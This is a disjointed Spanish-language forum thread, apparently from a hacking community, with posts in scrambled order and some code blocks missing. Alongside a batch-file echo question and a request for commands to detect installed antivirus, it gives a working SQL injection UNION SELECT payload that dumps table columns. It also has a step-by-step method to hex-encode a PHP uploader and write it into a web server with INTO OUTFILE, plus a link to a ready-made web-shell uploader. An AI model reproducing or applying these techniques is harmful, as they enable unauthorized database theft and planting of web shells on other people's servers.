Buenas tardes pues de hecho era por consola es el sistema que utiliza windows para avisarte cuando no tienes AV instalado como saben "windows" es un sistema basado en DOS asi es que todo lo que se hace visual pasa a poder hacerse por medio de consola xD bueno eso tengo entendido.

Me autorespondo por si alguien mas llega a necesitarlo lo unico que se necesita hacer es:


echo echo f000^>^>shell.x >> C:\bat.bat

Hay que poner un "^" antes de cada etiqueta ">"

Bueno perdon por la autorespuesta.

Buenas tardes de nuevo despues de buscar por todas partes paso a preguntar aqui en el foro lo siguiente: ¿hay algun comando para saber por medio de CMD que antivirus o firewall tiene instalado windows?.

Estoy casi 90% seguro de que habia visto el comando en alguna parte de la web pero no volvi a dar con el intente con process monitor al iniciar windows pero nada u.u en verdad ocupo el comando bueno desde ya muchas gracias

Buenas tardes vengo a pedir su ayuda me he estado leyendo y buscando tutoriales y manuales como loco y simplemente no doy con la solucion a mi problema espero que puedan ayudarme  

Tengo un codigo en bat el cual necesito meter de la siguiente manera:


0k hasta aqui todo bien pero viene la parte complicada en la que tengo que meter el codigo de la siguiente manera:


simplemente no doy con la solucion ya que en el archivo bat.bat me pone solo lo siguiente en esa linea:


echo f000

Realmente no se donde buscar ya jejeje me busque aqui en el foro y no encuentro algo que me de resultados si esta ahi y no lo vi les pido disculpas tambien si el titulo no es muy explicito jajaja desde ya gracias.

xD men hubieras empezado por hai... si es tu web puedes facilitarles el code al los chavales y asi te ayudarian mas rapido...  jajaja igual falta que ellos quieran eso...

seee la verdad es que eso es ingenio... xD muchas gracias @tragantras y a @phamtom por su ayuda... =)  jajaja

:O no lo habia pensado... muchas gracias lo intento i luego comento como me fue... jajaja de lujo men wireshark me dio el link que utiliza y no se ni poque funciono porq es practicamente lo que yo introducia...  jajaja bien me pondre a analizarlo la respuesta  era and+1=0 Union Select 1,group_concat(olumnas),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+FROM+mx.tabla-- eso seria todo...

xD jajaja men busca en google bypass upload xD

Asi es una cosa que es digna de aclarar es que tienes que tener permisos de escritura sobre la carpeta para poder uplodear el codigo... osea que aunque tengas el FPD no lograras hacer nada si no tienes permisos de escritura... bueno el proceso es el siguiente:

coges todo el codigo de el uploader... y te vas directo a esta web: http://nickciske.com/tools/hex.php que es un convertidor de texto a hexa pones el code y cambias la opcion: "Escaped Bytes ("%A9%34")" a "Pure Bytes ("A934")" y conviertes el code... bien haora es momento de sustituir : "php <? phpinfo(); ?" por el code convertido y quedaria asi la url:

http://www.mipage.com/news.php?id=-1+union+all+select+0,1,0xelcodeenex,3,4,5,6,7,8+into+outfile+'C:/inetpub/viaje/taxio4x4/uploader.php'--


asi tendria que ser...

bien iory330 este metodo para poder llevarlo a cabo necesitas encontral un FPD o Full Path Disclosure y eso solo se da en algunas paginas al introducir un caracter erroneo en la query osea que si te da algun otro tipo de error o simplemente no te muestra alguna imagen cuando quieres ver si es vulnerable entonces es muy dificil que logres hacer el outfile... puedes ver si en el host hay otras web's que si nos den el FPD... haora:

Segundo, que quere decir este codigo de php <? phpinfo(); ?

me parece que es para ver que funciones tiene habilitadas el server y saber que si subes por ejemplo la shell entonces ver si va a estar en safe mode off xD no soy mui bueno para explicar pero al momento de subir la shell tienes que cambiar el <? phpinfo(); por el code de la shell... en este caso te recomiendo que pongas un uploader: http://j-h.by.ru/shell/Sh3ll/P/pws.php.txt (espero no hacer spam) ya que asi te quitas los limites de caracteres y puedes uplodear la shell que gustes ya que ese uploader no tiene filtros xD

espero haberte ayudado.